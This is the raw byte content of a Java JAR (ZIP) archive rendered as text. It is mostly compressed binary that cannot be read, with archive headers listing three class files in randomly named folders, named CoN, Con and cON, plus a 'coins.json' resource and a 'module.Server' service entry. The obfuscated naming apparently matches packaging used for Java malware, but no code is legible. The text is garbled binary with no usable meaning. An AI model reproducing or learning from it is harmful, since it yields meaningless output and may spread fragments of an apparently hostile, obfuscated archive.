PK
     �m�H               FaTkUfxhnBBcrZxWTk/PK
     �m�H            $   FaTkUfxhnBBcrZxWTk/WNXlFCtlrcJUfFHm/PK
     �m�H            	  META-INF/��  PK
     �m�H               _016_/PK
     �m�H               _016_/coins/PK
    �m�H:�{  �  -  FaTkUfxhnBBcrZxWTk/WNXlFCtlrcJUfFHm/CoN.class  �      {      �Q�N1=f`p���F�3�[��D��]*��q�7ib�h��QƎ`mz{{�9�'����'��E�x�tLD@��a��H�{w�>A0�������yaS�J=�^���������j&���t&M��r)oX%�9��K`��3[���01�i?�11� ���ˬ���S&DK޶$A����xq���ߺ�e��tS�����NRO	m�}�a��%B	2�-�T.�������O�7�i���e���'���Q�ʊ���^��X��搴!�vQ!��J+j����'���:m#�2`���g_z���J#*��6�5��.u]�~O���a�����f��/F�~y���x�+�m���PK
    �m�H]6��  8	  -  FaTkUfxhnBBcrZxWTk/WNXlFCtlrcJUfFHm/Con.class  8	      �      �U[WW��d�0VA�K/����
mE,�J����8L$3t2Q�Z5ҋ���^�O}ѷ^&]MWWW������}#��"ke����˷����?����N|/��"���@��
qD�\�"X��N	Uh��e.�q�%��Hx��8.���>�ս">�P�s�d�H	�\���2�:�/ljjrB��lR�p�P6���b�4�g�GGFgu��a`C�������E`�f�߲�ˤ�N�h���0����)oJM�?^T/���j��m+a��p^5e�2��2��,��"d��7<EEmgAoⴌ!��0��n�6�I$�<�F�8+�m���ATĄ�&䂣����X���rkE����a��c���aXMΙVJ�����0x�u;�T�i�?��%�r�ّ˘�63����� ]M1�ez[T%����������_�[��/���$uc�^(LM�.�>*<�P�	C��3�ӶN|]f��SW"r��3���˺gh�A��]d�����{m�����o7$��2���������'�L��ԡR��1�Zң>�$�@-���v��9�1]*��E,�?�"ޑp�ŭ�Um)b�]���G��J�)ݰ�t^�ʝg�P�FxDM�2�chz���9	��%�CO1��n/���"�8�DC�0Һe��l�y��-�7���<}C��4�R
mA��)�@s���E�\��O���_�+����A�'��6�ѝR,n�x�_�7(�me��L�?���Y�έ,�5��,c#�������3ѹ�ө`�4��L'�i�����T�N|�ёZ���p�w��@͒K�}�n�����y�|̋�*���CUtu^��ŗt�ǛIu�&���U���Ҷj/��!�85��\Ռ����k��!�M��9�<*�v.���}B�p�p�KP&��Gx��#-*��@ʣJ�Ane�]�/
��8��z���(��*@{��}]��ç�|�t7��^ɐ�ɡf���Bֵ<X���(�-E�X�>V����q��C���p��l�m|��p�Wp-I�g�+��Ԍ6Z��y�����E��_�u�; =q��	���0�sT�y
1�@:�,䐠���Ĳ�w��x��O֣�Y7vg���򻛚=#ħO�t�ӱn!6��v�g�{���NhoZeku���L2��m��:����MY�V�E�	�s�6�_�+��ґ�{?m��!Uw����PK
    �m�H�}/�		  �  -  FaTkUfxhnBBcrZxWTk/WNXlFCtlrcJUfFHm/cON.class  �      		      �W	\S��>��x<+F�b)i�
�
,B+A��		K^]�ṷ;�����\7�n��6���W�ns]��i�ݗ��[��á������������ˏ?�J�(��'��K	
L�H�E��Jء�^]ة@B��]
r�㥇�^����%�Z�kX�Q������^K`�},�s�i��+� /A��˻}��0B�K��ϲ����?�U�@����qH¨��c�$���8� /�K�(��m���~w0��ػO�q}$�w�Q�?�Q�eS0�7XḒ`�NbS�O`m�����hп7�yy!�>�	09X0��Q��-p�E�����Mrx͌��`H#��O+0�h<�kѨ���XSq=r��{�#s$
f;�F���%F�lF�:�M�x�2r̎���Ϣ��/��p��2ǂ����Κ$���7����zP/`�3N�/�/y��P��U��$�Iśq7˾���_�U���v��;U܃wQ!�yn��
������]*ލ{U܇��x/���U<���8���� �%U�A<��C�W�aS��>���G�k���<�F�`$,�c*&�E��q:���a��P�I|�=>�Q_�D��H<ܗa��*>�!����*N0c�{)e� ��K�&E�'/A��ڐ� !leܵ��,�HZ\����?F,�Q���@�x��He��ģ�!��S�c>/!6��:dp�v��׌y�����.�"�#3�����6���!�# �4�U\u��3Id�?2���AW���.)�z$�,߱�i�B)a�j������(r�R	VBؼ?�	)fGo#��@(�R��.?)��fk�j(R�V(�B�$8��
3=�X:ቔc�����#33�-&Fޢ�H_<��;��%�1M�)�X�}��E���Ӓ���"�u]�gk�4w��e�C��%Ѣ:�6�c�).��B�ZxT@����`~���y6}N�vx�p����!o��2�P�L�Y�!mX�U�d�SI�vM��y��4!�a���%�V�L)8� !%}���O�0s�HY�1�����`�YQl_��Wx�׊vp���hC
&M*��g���Dw��w�P�S�)�W
�����j�&�;�.��|����q*���^�0m-~�PW��`��1�����=�B-Mz(����r�;���/~�#�T��>f�.�96��*��>��?��<n��U*6�F���QS$|��}��d�ޠ�lɵU
wV��szW����5!մ�H�oi3��/������2�H�j�hN���Z:���(��W��R����0���]^k���O�ݖ[]i/e�������%��#/E��e�,��x�X-��K�*KW��/^�*�\���X�,��ɻ�dҀ@�,�\ͦ�+˂����XC/�B���E;)7��H�ut�D��Y�,p�N"�"�v(����'��N����(��Fګ	J.�9�,�O[�!#���L�I�mS0�\���OA�9��ߜ�wdOB�L!�W1	�N4�O_��.X���E���5u��b`��N2�{cvi
K�����d?�d�X�0�o���?$�6"�)M�(�D����`���gQ�\���(r�z)Oї�1���Z+��Cf�f����^c��e`�p9}��ig���	�Mm�I\��5�2S���������D�%x	?�Mԋ2\��L��n�=����#x�ԫm8��x��Yl��)��l��+?��!�pg���
+]�GQf�˥��-Y6��#�nV%s��� 4P���М��2�b
S$�9���)�=l�?	�k��v
�3=�����P��ŕ�i��	D���t�ƺL��'i���ڕ���|�`����k\iM���~��P"��TzʍZ�������Q��R��F.��w���<��eӤ��6�r�y~�*�O��G����b�ۖ� h��i�nR�袘��zB뮇�粋|k��&�/v�E�B�uuf�Y,"(VL�b�����ۉ�6I)�J��$y���V'AM�u�]:#��܊[�Gp)Eފ܀^П:��bM�R���]J���d��		�Uh+=��g�$O��*�"�9��
m&���/�D��Ԧ@\E��r�LBxY'f���)�?��e���4������U��)�$ l�r>f��bU��'&qf���L��5�U*��b�Y-c�O�q�ZO�N�]�#��n��H��j�=���:�*l���0M���-Ԑs���u1WW�$g�,Iʚ�*&��\_tt��)����%�%/ֱ\��PK
    �m�H�b�E�      _016_/coins/coins.json        �      ��Mo�@���UO �H\��~@�$����aco�Um���i��g�I2�A���<��������sr
g����هӳY�Vfa�ө^�x{�fr�e�Fd0"��
����j�?�4�2����]>��0�_�>|����b���o7�i������#\�.v�(:z�8,��m!�'R�K��L�P�,$zB�F٩��GR�o�,��,Zۺ�����k�]*��!����$�����H����(��S�!~���s�q�s@�ɗ6$~N�F���Gb|��R(���Di���Lz���wZ�L�P��/���wwLr �ƙ���	���-<ov������wP���I�Uc��{i�`?&� 9hL|���E��Bm#4��ܣ`�ǀ�X�lV�R)�h�J��(=3$0]���H����ԇ"�Reŭ�#�k�4
߶fV��$�봮*v]4��!K�>��	���V�#��n��0"tCZ�M�=�!*	}�i2b��h�Ɋ��4\sw�O_}�^�&L�H2��ͦ#2�U�c�ʿgTt������[Vn��w%����o?��O6�J۫�m�!c��;L;�K�Uо�Ț�5Jr�qsp�/�'ǟ��$ 5����$��za��Id��)��B$� wp�� 㛜;h��˥��JC�µ�MHa/�h�3[n������,���b�Gy�sb��#Un�?kmP�����y������p��ʉ������K�G���Ƶ����	��cǬ�����;ơ�7<v��r��fd6,�PW~�^�0X�H2���R��3¡�a��bP���,�B�؍^t4��(��ӐC�C��mTw�aO�
����6NOq��g��m;���n��c��\�	
�C�$�[v��)�����.T���`(�,���ؑ�P��&����X�,&Z��rg(#��BCB�WŴA>\P���a�S-v�C�C}b��!9�LԨK=���s���s�
��ɯPK
     �m�H               META-INF/services/PK
    �m�Hjǖb)   '     META-INF/services/module.Server  '       )       sK�M���srJ.�������qs.�)J�
Ms���s�� PK
     �m�H                      �A    FaTkUfxhnBBcrZxWTk/PK
     �m�H            $          �A1   FaTkUfxhnBBcrZxWTk/WNXlFCtlrcJUfFHm/PK
     �m�H            	         �As   META-INF/��  PK
     �m�H                      �A�   _016_/PK
     �m�H                      �A�   _016_/coins/PK
    �m�H:�{  �  -           ���   FaTkUfxhnBBcrZxWTk/WNXlFCtlrcJUfFHm/CoN.classPK
    �m�H]6��  8	  -           ���  FaTkUfxhnBBcrZxWTk/WNXlFCtlrcJUfFHm/Con.classPK
    �m�H�}/�		  �  -           ��  FaTkUfxhnBBcrZxWTk/WNXlFCtlrcJUfFHm/cON.classPK
    �m�H�b�E�               ��n  _016_/coins/coins.jsonPK
     �m�H                      �A�  META-INF/services/PK
    �m�Hjǖb)   '              ���  META-INF/services/module.ServerPK        X    